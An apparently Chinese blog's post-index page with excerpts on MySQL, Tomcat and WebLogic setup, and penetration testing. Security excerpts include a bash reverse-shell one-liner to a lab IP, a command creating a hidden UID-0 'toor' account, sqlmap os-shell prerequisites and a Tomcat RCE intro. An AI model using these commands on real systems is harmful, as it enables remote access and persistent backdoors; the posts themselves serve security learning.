返回顶部
上一页 1 2 3 4 5 6 ··· 21 下一页
摘要:表结构及数据 DROP TABLE IF EXISTS `course`; CREATE TABLE `course` ( `name` varchar(255) CHARACTER SET utf8 COLLATE utf8_general_ci DEFAULT NULL, `course_nam 阅读全文
posted @ 2020-05-11 18:56 御用闲人 阅读(200) 评论(0) 推荐(0) 编辑
摘要:select * from table order by n n 表示select里面的第n个字段,整段sql的意义是:查询出来的结果,按照第N个字段排序 阅读全文
posted @ 2020-05-11 18:06 御用闲人 阅读(600) 评论(0) 推荐(0) 编辑
摘要:MySQL的注释风格总的来说有三种、它们分别是 : 1、单行注释可以用"#" select 1 as cname; #this is a comment + + | cname | + + | 1 | + + -- (#后面直接根的就是注释) 2、单行注释的第二种写法用 "-- " 注意这个风格下" 阅读全文
posted @ 2020-05-09 15:07 御用闲人 阅读(258) 评论(0) 推荐(0) 编辑
摘要:欢迎探讨。 阅读全文
posted @ 2020-05-07 18:26 御用闲人 阅读(92) 评论(0) 推荐(0) 编辑
摘要:0×00前情提要 Apache Tomcat团队10月3日宣布,如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操作系统上的潜在危险的远程执行代码(RCE)漏洞,CVE-2017-12617:远程代码执行漏洞。 只 阅读全文
posted @ 2020-04-10 16:20 御用闲人 阅读(165) 评论(0) 推荐(0) 编辑
摘要:方法一:(bash反弹) 反弹shell命令如下: bash -i >& /dev/tcp/ip/port 0>&1 首先,使用nc在kali上监听端口: nc -lvp 7777 然后在目标机输入: bash -i >& /dev/tcp/192.168.0.30/4444 0>&1 可以看到sh 阅读全文
posted @ 2020-04-09 11:43 御用闲人 阅读(1184) 评论(0) 推荐(0) 编辑
摘要:该版本启动时需要输入用户名和密码,这个问题可以使用如下方法解决: cd /home/weblogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer#创建文件夹 mkdir security#创建存储用户 阅读全文
posted @ 2020-04-08 10:01 御用闲人 阅读(152) 评论(0) 推荐(0) 编辑
摘要:一、安装jdk环境: 这里不再赘述,见https://www.cnblogs.com/yyxianren/p/10710089.html 注意:jboos7.1只兼容java1.7 及java1.6,使用不兼容的java会出现空指针报错。 二、安装jboos 1、下载jboos https://jb 阅读全文
posted @ 2020-04-03 13:49 御用闲人 阅读(105) 评论(0) 推荐(0) 编辑
摘要:主要原因是生成随机数的时候卡住了,导致tomcat启动不了。 解决方案: vim $JAVA_HOME/jre/lib/security/java.security securerandom.source=file:/dev/random 改为 securerandom.source=file:/d 阅读全文
posted @ 2020-04-03 10:40 御用闲人 阅读(101) 评论(0) 推荐(0) 编辑
摘要:创建域慢启动慢的特征:创建域到70%时,进程长时间等待(命令行创建时停止在100%处),创建域启动Weblogic的时候也是长时间停止。 Weblogic在Linux下启动慢的原因,发现从进程堆来看,线程挂在security相关的随机数生成上面,是由于JDK的Bug(JDK从/dev/random读 阅读全文
posted @ 2020-04-02 18:19 御用闲人 阅读(120) 评论(0) 推荐(0) 编辑
摘要:[root@docker-test ~]# useradd -p "123456" toor -o -u 0 -g root 命令解析: -p 指定密码 -u 指定UID -g 指定用户组 -o 一般情况下除了root的uid为0,其他的用户不可以为0,所以需要-o来强制 阅读全文
posted @ 2020-03-26 09:40 御用闲人 阅读(781) 评论(0) 推荐(0) 编辑
摘要:很多的人会对os-shell的使用进行吐槽,这是得要多大的权限才能执行。是的,os-shell的执行条件有三个 (1)网站必须是root权限 (2)攻击者需要知道网站的绝对路径 (3)GPC为off,php主动转义的功能关闭 此处对于中小型企业,如果自己搭建的服务器,例如直接用wamp或者phpno 阅读全文
posted @ 2020-03-16 17:58 御用闲人 阅读(915) 评论(0) 推荐(0) 编辑
摘要:1、演示页面 <?php session_start(); if(isset($_SESSION['token']) && isset($_POST['username'])){ if(empty($_POST['token']) || $_POST['token'] != $_SESSION['t 阅读全文
posted @ 2020-03-11 16:49 御用闲人 阅读(662) 评论(0) 推荐(0) 编辑
摘要:指定参数进行扫描,而不是扫描所有参数,这样可以避免浪费时间到非注入点参数上,从而提高扫描效率。比如扫描以下URL,已知Submit是静态参数,id是动态的,那么在扫描的时候只需要指定id就行了,指定多个参数时用双引号包起来,并以逗号分隔。也可以指定HTTP请求头中的参数,如User-Agent sq 阅读全文
posted @ 2020-03-11 14:09 御用闲人 阅读(2439) 评论(0) 推荐(0) 编辑
摘要:有时,通过Runtime.getRuntime().exec()执行命令的有效负载有时会失败。使用Web Shell,反序列化利用或通过其他媒介时,可能会发生这种情况。 有时这是因为重定向和管道字符的使用在启动过程的上下文中没有意义。例如,在shell中执行ls> dir_listing会将当前目录 阅读全文
posted @ 2020-03-11 13:43 御用闲人 阅读(179) 评论(0) 推荐(0) 编辑
上一页 1 2 3 4 5 6 ··· 21 下一页